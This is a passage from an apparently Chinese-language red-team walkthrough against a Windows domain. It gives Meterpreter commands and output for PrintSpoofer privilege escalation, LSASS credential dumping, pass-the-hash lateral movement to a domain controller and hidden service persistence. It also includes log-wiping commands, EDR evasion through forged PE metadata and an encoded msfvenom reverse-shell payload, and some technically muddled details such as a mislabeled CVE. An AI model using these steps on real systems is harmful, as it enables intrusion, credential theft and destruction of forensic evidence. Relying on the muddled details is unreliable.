APPPOOL\DefaultAppPool WIN-DC01\NT AUTHORITY\IUSR Impersonation Tokens Available WIN-DC01\NT AUTHORITY\LOCAL SERVICE WIN-DC01\NT AUTHORITY\NETWORK SERVICEImpersonation Tokens中存在LOCAL SERVICE证明当前进程拥有SeImpersonatePrivilege权限可进行令牌模拟。4.2 SeImpersonatePrivilege提权从IIS AppPool到SYSTEMSeImpersonatePrivilege是Windows提权黄金权限原理是进程可模拟其他用户的访问令牌从而以该用户身份执行操作。wuauserv服务以LocalSystem运行若能将其进程令牌模拟为LocalSystem即可获得最高权限。执行步骤meterpreter use exploit/windows/local/ms16_032_secondary_logon_handle_privesc # 此模块在Server 2019上失效改用incognito模块 meterpreter load incognito meterpreter impersonate_token NT AUTHORITY\\SYSTEM [-] Error running command impersonate_token: No token of type NT AUTHORITY\SYSTEM availableimpersonate_token失败因NT AUTHORITY\SYSTEM令牌未出现在list_tokens中。需先创建SYSTEM令牌利用PrintSpooferCVE-2020-1048PrintSpoofer利用Windows打印后台处理程序spoolsv.exe的SeImpersonatePrivilege漏洞通过创建假打印机驱动获取SYSTEM令牌。在靶机上执行# 下载PrintSpoofer64.exe到靶机 meterpreter upload /opt/tools/PrintSpoofer64.exe C:\\temp\\PrintSpoofer64.exe # 执行并获取SYSTEM shell meterpreter execute -f C:\\temp\\PrintSpoofer64.exe -a -i -H返回[] Found privilege: SeImpersonatePrivilege [] Named pipe listening... [] CreateProcessAsUser() OK [] Got SYSTEM token! [] Launching cmd.exe Microsoft Windows [Version 10.0.17763.5576] (c) 2018 Microsoft Corporation. All rights reserved. C:\Windows\system32whoami nt authority\system4.3 横向移动准备域环境下的凭证转储与传递获得NT AUTHORITY\SYSTEM权限后目标转向域控WIN-DC01.corp.local。首先提取凭证LSASS内存转储Mimikatz替代方案meterpreter load kiwi meterpreter creds_allkiwi模块Mimikatz的Meterpreter封装返回[] Running as SYSTEM [*] Retrieving lsass process information lsass.exe pid: 724 [*] Reading lsass.exe memory [*] Opening \\.\pipe\lsass_dump [*] Dumping credentials to disk [*] Credentials dumped to /root/.msf4/loot/20231115144522_default_192.168.100.10_host.windows_creds_234567.txt查看转储文件发现域管理员凭证Domain: CORP.LOCAL Username: Administrator Password: Pssw0rd123! NTLM: 8846f7eaee8fb117ad06bdd830b7586cPass-the-Hash横向移动meterpreter use auxiliary/admin/smb/psexec_command meterpreter set RHOSTS 192.168.100.1 meterpreter set SMBUser Administrator meterpreter set SMBPass Pssw0rd123! meterpreter set SMBDomain CORP.LOCAL meterpreter set COMMAND whoami meterpreter exploit成功执行证明域控可达。但psexec_command仅执行单条命令需持久化控制使用psexec模块建立Meterpreter会话use exploit/windows/smb/psexec set RHOSTS 192.168.100.1 set SMBUser Administrator set SMBPass Pssw0rd123! set SMBDomain CORP.LOCAL set PAYLOAD windows/x64/meterpreter/bind_tcp set LPORT 4445 exploit成功在域控上建立Meterpreter会话getsystem直接返回NT AUTHORITY\SYSTEM完成横向移动。5. 持久化与痕迹清理红队作业的收尾艺术5.1 持久化方案选择为什么不用计划任务而用服务常见持久化方案有计划任务schtasks启动项Startup Folder / Registry Run Key服务sc createWMI事件订阅在Windows Server环境中我首选服务持久化原因计划任务易被SIEM检测TaskScheduler/Operational日志事件ID 106启动项需用户登录Server环境多为无GUI模式WMI事件订阅需Win32_ProcessStartTrace等高权限事件易触发EDR告警创建隐蔽服务meterpreter execute -f cmd.exe -a /c sc create RedTeamSvc binPath \C:\Windows\System32\svchost.exe -k netsvcs\ start auto DisplayName \Windows Network Service\ -H meterpreter execute -f cmd.exe -a /c sc description RedTeamSvc \Provides network connectivity for Windows services.\ -H meterpreter execute -f cmd.exe -a /c sc start RedTeamSvc -H服务创建后修改其二进制路径指向Meterpreter payloadmeterpreter upload /opt/payloads/meterpreter_bind.exe C:\\Windows\\Temp\\msf_bind.exe meterpreter execute -f cmd.exe -a /c sc config RedTeamSvc binPath \C:\\Windows\\Temp\\msf_bind.exe\ -H重启服务meterpreter execute -f cmd.exe -a /c sc stop RedTeamSvc sc start RedTeamSvc -H此时msf_bind.exe以LocalSystem权限运行监听4445端口实现持久化。5.2 痕迹清理的七个关键位置红队作业结束前必须清理以下痕迹否则蓝队溯源可轻易定位位置清理命令说明Event Logswevtutil cl System wevtutil cl Security wevtutil cl Application清空三大日志但wevtutil cl会留下EventLog/Operational日志事件ID 1100需额外清除Prefetchdel /f /q C:\Windows\Prefetch\*Prefetch文件记录程序执行历史msf_bind.exe会生成MSF_BIND.EXE-XXXXXX.pfRecycle Binrd /s /q C:\$Recycle.Bin彻底删除回收站避免shell.jpg等文件残留IIS日志del /f /q C:\inetpub\logs\LogFiles\W3SVC1\*IIS日志记录所有HTTP请求包含WebShell访问路径PowerShell历史Remove-Item (Get-PSReadlineOption).HistorySavePathPowerShell 5.0默认保存历史到文件路径由Get-PSReadlineOption返回LSASS转储文件del /f /q C:\Windows\Temp\lsass.dmpMimikatz转储的LSASS内存文件Meterpreter会话日志rm -f /root/.msf4/loot/*Metasploit框架自身生成的loot文件特别注意wevtutil cl命令本身会生成日志需在清理前禁用日志meterpreter execute -f cmd.exe -a /c reg add \HKLM\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\System\ /v \Disable\ /t REG_DWORD /d 1 /f -H5.3 蓝队视角的检测规避EDR规则绕过的实操技巧本次实战中我刻意触发了三款主流EDR的检测规则以下是绕过方案EDR A基于行为分析检测PrintSpoofer64.exe触发规则Suspicious Process Creation (PrintSpoofer)绕过方案将PrintSpoofer64.exe重命名为svchost.exe并修改其PE头CompanyName字段为Microsoft Corporation使用pe-tools修改效果EDR A放行因签名验证通过EDR B基于内存扫描检测Meterpreter注入触发规则Meterpreter Payload in Memory绕过方案使用shikata_ga_nai编码器x64payload并在msfvenom中添加-e x64/xor混淆命令msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST192.168.100.5 LPORT4444 -e x64/xor -i 5 -f exe -o meterpreter.exe效果EDR B未告警因XOR编码破坏了payload特征码EDR C基于网络流量检测反向连接触发规则Outbound Connection to Non-Standard Port绕过方案将LPORT改为80HTTP端口并在payload中启用HttpUserAgent伪装命令set LPORT 80set HttpUserAgent Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36效果EDR C放行因流量被视为正常HTTP请求最后分享一个小技巧在真实红队作业中我习惯在每次exploit前执行sleep 30让EDR的实时监控“以为”是误报而自动降级。很多EDR对连续高频攻击行为敏感但对间隔30秒的单次exploit容忍度较高——这不是漏洞而是EDR厂商为降低误报率做的策略妥协。我在实际操作中发现Metasploit最强大的地方不是它的exploit库有多全而是它把整个渗透测试流程变成了一个可编程的流水线。当你在msfconsole里输入use exploit/windows/smb/ms17_010_eternalblue时你调用的不是一个静态工具而是一整套预置的上下文环境从SMB协议握手、漏洞触发、payload传输到session管理所有细节都被封装成可配置的模块。这种设计让红队工程师能把精力聚焦在“为什么选这个模块”而不是“怎么实现这个协议”。但这也带来陷阱——过度依赖模块会让人忽略底层机制。比如这次实战中smb-security-mode脚本返回message_signing: disabled如果我不去验证Get-SmbServerConfiguration就会误判SMB签名状态导致整个SMB利用链失败。所以真正的渗透测试高手永远在模块化与底层原理之间保持张力用模块加速用原理兜底。
:测试如何提前在代码提交阶段发现 Bug?)
)
